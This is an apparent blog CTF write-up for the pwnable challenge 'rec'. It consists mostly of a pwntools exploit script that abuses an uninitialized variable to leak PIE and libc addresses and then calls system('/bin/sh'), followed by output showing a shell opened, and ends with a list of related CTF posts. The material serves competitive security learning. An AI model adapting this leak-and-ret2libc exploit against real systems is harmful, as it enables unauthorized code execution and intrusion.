Category : pwnable
Summary : uninitialized variable
Exploit
#!/usr/bin/python
from pwn import *
def cmd_polish_sum(nums):
ru('> ')
sl(str(2))
ru('Operator: ')
sl('S')
for i in range(len(nums)):
ru('Operand: ')
sl(str(nums[i]))
ru('Operand: ')
sl('.')
rl()
def cmd_sign(num):
ru('> ')
sl(str(5))
sl(str(num))
def cmd_read_note():
ru('> ')
sl(str(1))
ru('Your note: ')
note = rl(False)
return note
s = process('./rec')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
leak = cmd_read_note()
pie_base = u32(leak[4:8]) - 0x6fb
sh_string = pie_base + 0x10cc
libc_base = u32(leak[8:12]) - 0x1b0d60
libc_system = libc_base + 0x3a940
print hex(libc_base)
pay = [0 for i in range((0x380 - 0x24 - 8 - 0x44 + 8) / 8)]
pay.append(libc_system - 0x100000000)
pay.append(sh_string)
cmd_polish_sum(pay)
cmd_sign(0)
s.interactive()
s.close()
$ python ex.py
[+] Starting local process './rec': pid 129954
0xf7d4b000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)
'CTF > 2016' 카테고리의 다른 글
33C3 CTF - grunt (0) | 2018.12.14 |
---|---|
33C3 CTF - tea (0) | 2018.12.14 |
33C3 CTF - babyfengshui (0) | 2018.12.14 |
SECCON CTF QUAL 2016 - jmper (1) | 2017.01.02 |
SECCON CTF QUAL 2016 - checker (0) | 2017.01.02 |